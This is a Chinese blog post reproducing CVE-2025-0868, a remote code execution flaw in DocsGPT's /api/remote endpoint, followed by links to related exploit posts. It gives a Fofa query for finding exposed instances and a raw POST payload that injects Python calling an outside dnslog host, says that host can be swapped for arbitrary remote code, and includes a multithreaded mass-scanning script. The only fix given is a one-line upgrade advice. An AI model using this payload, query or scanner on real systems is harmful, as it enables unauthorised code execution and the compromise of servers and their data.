DocsGPT 远程命令执行漏洞复现(CVE-2025-0868)

最新推荐文章于 2025-06-14 13:50:04 发布
最新推荐文章于 2025-06-14 13:50:04 发布
阅读量688 收藏 4
点赞数 4
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/147903313
版权

免责申明:

本文所描述的漏洞及其复现步骤仅供网络安全研究与教育目的使用。任何人不得将本文提供的信息用于非法目的或未经授权的系统测试。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我们联系,我们将尽快处理并删除相关内容。

前言:

我们建立了一个更多,更全的知识库。每日追踪最新的安全漏洞并提供批量性检测脚本。

更多详情:

https://pc.fenchuan8.com/#/index?forum=101158&yqm=DGR4X

0x01 产品描述:

        DocsGPT是一款基于大语言模型的开源文档智能问答工具,通过整合GPT系列模型(如GPT-3.5、Falcon和Llama2优化版本)Meta的Faiss相似性搜索库及LangChain框架,支持用户以自然语言对话形式快速查询TXT/PDF/MD/RST/ZIP等多格式文档内容。该系统提供网页端、本地化部署和Chrome插件三种使用方式,允许企业私有化部署知识库并实现离线问答服务,尤其适用于技术文档管理、智能客服等场景,其开源特性还支持用户自定义模型和提示词模板以增强安全性与灵活性。
0x02 漏洞描述:

        DocsGPT 中存在导致远程代码执行 (RCE) 的漏洞。由于使用 eval() 对 JSON 数据进行解析不当,未经授权的攻击者可发送任意 Python 代码以通过 /api/remote 端点执行。 

0x03 影响版本:

0.8.1 <DocsGPT< 0.12.0
0x04 搜索语句:

Fofa:body="Welcome to DocsGPT"


0x05 漏洞复现:

POST /api/remote HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
Content-Length: 232

user=1&source=reddit&name=other&data={"source":"reddit","client_id":"1111","client_secret":1111,"user_agent":"111","search_queries":[""],"number_posts":10,"rce\\\\":__import__('requests').get('http://111.9io46y.dnslog.cn/')}#":11}

这里dns地址可以替换为远程任意可执行代码

 

0x06 批量检测脚本:

批量检测:
python poc.py -f url.txt -p payload
单个检测:
python poc.py -u your-ip -p payload
import argparse
import requests
from urllib.parse import quote, urlparse, urlunparse
from concurrent.futures import ThreadPoolExecutor

requests.packages.urllib3.disable_warnings()

def normalize_url(raw_url):
    if not raw_url.startswith(('http://', 'https://')):
        raw_url = f'http://{raw_url}'
    parsed = urlparse(raw_url)
    return urlunparse((
        parsed.scheme,
        parsed.netloc,
        '/api/remote',
        '', '', ''
    ))

def build_form_data(dnslog_url):

    payload_json = (
        '{{"source":"reddit",'
        '"client_id":"1111",'
        '"client_secret":1111,'
        '"user_agent":"111",'
        '"search_queries":[""],'
        '"number_posts":10,'
        '"rce\\\\":__import__(\\\'requests\\\').get(\\\'{dns}\\\')}}#":1}}'
    ).format(dns=dnslog_url)
    return f'user=1&source=reddit&name=other&data={quote(payload_json)}'

def check_vulnerability(target, form_data, timeout=15, debug=False):
    try:
        final_url = normalize_url(target)
        headers = {
            "Host": urlparse(final_url).netloc,
            "Content-Type": "application/x-www-form-urlencoded"
        }

        if debug:
            print(f"\n[DEBUG] 完整请求URL: {final_url}")
            print(f"[DEBUG] 请求头: {headers}")
            print(f"[DEBUG] 请求体原始数据:\n{form_data}")

        response = requests.post(
            final_url,
            headers=headers,
            data=form_data,
            timeout=timeout,
            verify=False
        )

        if debug:
            print(f"[DEBUG] 响应状态码: {response.status_code}")
            print(f"[DEBUG] 响应体前200字符:\n{response.text[:200]}")

        return response.status_code == 200 and '"status":"ok"' in response.text.replace(' ', '')
    except Exception as e:
        if debug:
            print(f"[DEBUG] 异常信息: {str(e)}")
        return False

def main():
    parser = argparse.ArgumentParser(description="DocsGPT远程命令执行检测工具")
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument("-u", "--url", help="单个检测目标")
    group.add_argument("-f", "--file", help="批量检测文件路径")
    parser.add_argument("-p", "--payload", required=True, help="DNSLog监控地址")
    parser.add_argument("-t", "--timeout", type=int, default=15, help="请求超时时间(秒)")
    parser.add_argument("--debug", action="store_true", help="启用调试模式")
    args = parser.parse_args()

    form_data = build_form_data(args.payload.strip())
    
    # 处理目标列表
    targets = []
    if args.url:
        targets.append(args.url)
    elif args.file:
        with open(args.file, 'r') as f:
            targets = [line.strip() for line in f if line.strip()]

    print(f"[*] 开始扫描 {len(targets)} 个目标")

    with ThreadPoolExecutor(max_workers=20) as executor:
        for target in targets:
            executor.submit(
                lambda t: print(
                    f"\033[1;32m[+] 漏洞确认: {t}\033[0m" 
                    if check_vulnerability(t, form_data, args.timeout, args.debug) 
                    else f"[-] 目标安全: {t}"
                ),
                target
            )

if __name__ == "__main__":
    main()

 


0x07 修复建议:

尽快升级至安全版本

DocsGPT remote接口RCE(CVE-2025-0868)
m0_50125527的博客
04-23 284
DocsGPT是一款基于强大AI技术的智能文档助手,能够快速理解和生成各类文档内容。它支持自然语言交互,可帮助用户高效创建、总结、优化技术文档、产品说明、API手册等,同时具备智能问答和知识检索功能,大幅提升文档编写效率与准确性。无论是个人开发者还是企业团队,都能通过其直观的界面和协作特性,轻松管理文档生命周期,实现知识库的智能化升级。
漏洞防御实录:CVE-2023-XXXX远程代码执行漏洞修复指南
介绍各种好的开源工具!
05-20 898
2023年全球曝光的多个高危RCE漏洞(如CVE-2023-21768、CVE-2023-21839等)表明,此类漏洞的利用门槛正在降低,而防御复杂度却在持续攀升。• 紧急修复:针对已公开利用的漏洞(如CVE-2023-21839),直接应用厂商补丁。• 协议解析错误:如CVE-2023-21839(Weblogic T3/IIOP协议漏洞),恶意序列化数据触发远程类加载。• 权限管理失效:如CVE-2023-21554(MSMQ服务漏洞),未授权访问导致攻击者直接投递恶意消息队列。
Apache Tomcat 远程代码执行漏洞(CVE-2025-24813)复现
weixin_74338418的博客
04-23 852
一、漏洞概述远程代码执行漏洞(CVE-2025-24813)源于Apache Tomcat的反序列化机制未对用户输入进行严格验证,攻击者可通过构造恶意序列化对象绕过安全限制,处理部分 PUT 请求时,攻击者利用临时文件路径处理中的缺陷(将路径分隔符"/"替换为“.”),通过特定条件(如启用默认 servlet 的写入功能)实现远程代码执行并控制服务器‌。二、影响版本Tomcat 11.0.0-M1 至 11.0.2Tomcat 10.1.0-M1 至 10.1.34。
Apache Tomcat 远程代码执行漏洞(CVE-2025-24813) 超详细!
欢迎来到我的博客,这里是我分享Python开发心得与信息安全探索的乐园。作为一名热衷于编程与安全的技术爱好者,我始终致力于在Python的世界里深耕细作,探索其强大的功能与无限的可能性。同时,信息安全也是我关注的重点,我深知在这个数字化时代,保护数据安全的
03-14 9592
远程代码执行漏洞(CVE-2025-24813)源于 Apache Tomcat 的反序列化机制未对用户输入进行严格验证,攻击者可通过构造恶意序列化对象绕过安全限制,处理部分 PUT 请求时,攻击者利用临时文件路径处理中的缺陷(将路径分隔符"/"替换为“.”),通过特定条件(如启用默认 servlet 的写入功能)实现远程代码执行并控制服务器‌。‌将 Apache Tomcat 升级至安全版本(Tomcat 11.0.2+、10.1.34+、9.0.98+),以修复反序列化漏洞及 PUT 请求处理缺陷‌。
Samba 远程命令执行漏洞CVE-2017-7494)
07-29 4472
Samba 远程命令执行漏洞CVE-2017-7494)
漏洞复现------Webmin 远程命令执行漏洞CVE-2019-15107)
Z_Grant的博客
09-23 9371
文章目录一,webmin简介二,漏洞概述三,漏洞复现(1)环境搭建(2)exp四,漏洞分析五,漏洞修复 一,webmin简介 什么是webmin Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作 http://www.webmin.com/ Webmin 是一个用 Perl 编写的基于浏览器的管理应用程序。 是一...
漏洞复现-Apache RocketMQ 远程命令执行漏洞CVE-2023-33246)
玄道的网安博客
08-11 1209
RocketMQ的NameServer、Broker、Controller等多个组件缺乏权限验证,攻击者可以利用该漏洞利用更新配置功能以RocketMQ运行的系统用户身份执行命令。进入for循环后在 org.apache.rocketmq.broker.filtersrv.FilterServerUtil 中给的 callshell 方法去执行命令。72行调用方法 buildStartCommand。该中间件本来就是每30秒执行一次,漏洞产生的就是修改了配置文件,变量被赋值为了恶意命令,导致了命令执行
Nexus远程命令执行漏洞复现CVE-2019-7238)
qq_62056583的博客
07-10 986
漏洞是由于代码中基于OrientDB自定义函数的任意JEXL表达式执行功能,所以我们可以通过构造一个.jar包将请求拦截到burpsuite中并构造payload来实现一个代码注入,当然我们可攻击的方面不止于此还可以将靶机反弹shell等恶意的攻击行为。
漏洞复现CVE-2024-36401 Geoserver远程代码执行漏洞复现
总有人间一两风,填我十万八千梦
10-24 3240
GeoServer存在远程代码执行漏洞CVE-2024-36401),未经身份认证的远程攻击者可以通过该漏洞在服务器上执行任意代码,从而获取服务器权限。
XWiki SolrSearchMacros 远程代码执行漏洞复现CVE-2025-24893)(附脚本)
iSee857的博客
02-25 1894
XWiki 平台是一个通用的 wiki 平台,为构建在其上的应用程序提供运行时服务。任何 guest 都可以通过对 'SolrSearch' 的请求来执行任意远程代码执行。这会影响整个 XWiki 安装的机密性、完整性和可用性。(CVE-2025-24893)
安全生产台账系统
hanwei020502的博客
06-14 361
Trivy离线扫描:容器安全实践指南!
tersky的专栏
06-13 656
Trivy离线扫描:容器安全实践指南!
代码填空题技术实现:突破 highlight.js 安全限制的工程实践
半岛铁盒里
06-11 1278
本文探讨了在交互式代码教育平台中实现代码填空题的技术方案。针对highlight.js过滤HTML标签导致无法直接插入输入框的问题,作者提出了先完成语法高亮再修改DOM的双阶段解决方案。关键技术包括:1) 利用nextTick确保Vue DOM更新;2) 采用MutationObserver监听高亮渲染完成;3) 在渲染后插入受控输入框元素。方案解决了安全性问题,同时优化了用户交互体验,包括输入框索引跟踪和状态保存。特别强调了在处理异步渲染时,MutationObserver比嵌套nextTick更可靠。该
软件测试之简单基础的安全测试方法(另外包含软测面试题库)
最新发布
qq_39635178的博客
06-14 566
阅读本文前请注意最后编辑时间,文章内容可能与目前最新的技术发展情况相去甚远。欢迎各位评论与私信,指出错误或是进行交流等。
Proof of Talk专访CertiK联创顾荣辉:全周期安全方案护航Web3生态
weixin_58310340的博客
06-11 881
6月10日,CertiK联合创始人兼CEO顾荣辉在Proof of Talk 2025举办期间,接受大会官方专访,分享了他对Web3安全现状的观察以及CertiK的安全战略布局。
水库大坝安全监测之渗流监测
weixin_48039531的博客
06-12 756
通过在坝体和坝基不同位置埋设测压管或渗压计等仪器,监测不同深度、不同位置的渗流压力,绘制等势线,分析渗流场分布情况,评估大坝防渗效果与渗透稳定性。结合大坝整体安全状况,综合分析渗流监测数据与其他监测项目(如变形监测、应力应变监测等)数据,为大坝维护、加固等决策提供全面、科学的支持,确保水库大坝长期安全稳定运行。通过在坝体或坝基中铺设光纤,利用光纤中光信号与周围环境相互作用产生的变化,如光的强度、相位、频率等,感知渗流场参数,如渗流压力、温度等。对比不同部位的渗流压力分布,评估大坝防渗效果和渗流场的均匀性。
2025年渗透测试面试题总结-小鹏[实习]安全工程师(题目+回答)
soc的博客
06-10 976
安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
菌菇食用攻略:从营养解析到安全指南,解锁科学食菌
2503_90208218的博客
06-11 1252
菌菇食用安全与营养指南 菌菇营养丰富,富含蛋白质、维生素D及抗氧化物质,但食用不当存在风险。安全食用需注意:彻底加热(中心温度达74℃以上)、控制摄入量(成人每日100-150g)、特殊人群谨慎选择(过敏者、孕妇、慢性病患者等)。野生菌中毒事件频发,切勿轻信民间鉴别方法,应选择正规渠道购买。娱乐化传播菌菇中毒危害严重,需加强科学认知。合理食用菌菇需平衡其营养价值与潜在风险,遵循个体化膳食原则。
漏洞复现CVE-2025-
04-02
### 关于 CVE-2025 漏洞复现的信息 CVE-2025-1094 被描述为一个需要紧急关注和处理的关键漏洞[^2]。此漏洞可能允许攻击者通过特定条件下的输入验证不足来执行恶意操作,从而危及系统的安全性。为了有效应对这一威胁,组织应采取一系列措施,包括但不限于应用官方发布的补丁更新、强化输入数据的校验逻辑以及遵循行业内的最佳安全实践。 尽管具体的 CVE-2025 复现步骤未在现有资料中明确提及,但从其他类似案例(如 CVE-2021-3493 和脏牛漏洞 CVE-2016-5195)可以看出,通常涉及以下几个方面: #### 1. **环境准备** 对于大多数漏洞复现而言,构建合适的测试环境至关重要。例如,在 Linux 系统上的某些漏洞复现过程中,开发者可能会依赖 OverlayFS 来模拟权限提升场景[^3];而在 Windows 平台上,则需配置开发工具链,比如 Visual Studio 及其 C++ 支持组件[^5]。 #### 2. **编写 PoC (Proof of Concept)** PoC 是证明漏洞存在的重要手段之一。以下是基于假设情景的一个简单代码片段用于演示目的: ```cpp #include <iostream> using namespace std; int main() { char buffer[10]; cout << "Enter up to 9 characters: "; cin.getline(buffer, sizeof(buffer)); // Potential vulnerability point due to lack of proper validation. cout << "You entered: " << buffer; return 0; } ``` 上述例子展示了缓冲区溢出的可能性,如果用户输入超过预期长度的数据而缺乏严格控制的话,就可能导致程序行为异常甚至崩溃[^4]。 #### 3. **分析与调试** 利用调试器跟踪目标应用程序运行期间的状态变化情况可以帮助深入理解漏洞的工作机理。这一步骤往往结合静态代码审查一起完成,旨在发现潜在的安全隐患所在位置及其成因。 #### 4. **修补方案探讨** 针对已知缺陷提供有效的缓解策略同样重要。正如之前所提到过的那样,及时部署厂商推荐的安全升级包是最直接也是最可靠的方法之一。除此之外,加强前端/后端交互环节中的参数过滤机制亦能起到一定防护作用。 --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

iSee857

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值